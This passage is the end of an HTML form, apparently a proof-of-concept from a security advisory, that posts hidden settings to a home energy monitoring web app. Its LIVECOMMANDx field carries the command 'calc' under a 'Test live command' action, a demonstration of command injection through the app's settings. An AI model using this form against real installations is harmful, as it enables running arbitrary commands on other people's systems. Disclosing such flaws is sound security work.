name="COLORx" value="962629" /><br /> <input type="hidden" name="TYPEx" value="Elect" /><br /> <input type="hidden" name="PRODx" value="2" /><br /> <input type="hidden" name="PHASEx" value="1" /><br /> <input type="hidden" name="SKIPMONITORINGx" value="" /><br /> <input type="hidden" name="IDx" value="elect" /><br /> <input type="hidden" name="COMMANDx" value="houseenergy -energy" /><br /> <input type="hidden" name="PASSOx" value="100000" /><br /> <input type="hidden" name="PRICEx" value="0.23" /><br /> <input type="hidden" name="LIDx" value="elect" /><br /> <input type="hidden" name="LIVECOMMANDx" value="calc" /><br /> <input type="hidden" name="bntsubmit" value="Test live command" /><br /> <input type="hidden" name="EMAILx" value="" /><br /> <input type="hidden" name="WARNCONSODx" value="15000" /><br /> <input type="hidden" name="NORESPMx" value="true" /><br /> <input type="hidden" name="POAKEYx" value="" /><br /> <input type="hidden" name="POUKEYx" value="" /><br /> <input type="hidden" name="TLGRTOKx" value="" /><br /> <input type="hidden" name="TLGRCIDx" value="" /><br /> <input type="hidden" name="met_numx" value="1" /><br /> <input type="submit" value="Incongruity" /><br /> </form><br /> </body><br /></html><br /></code></pre>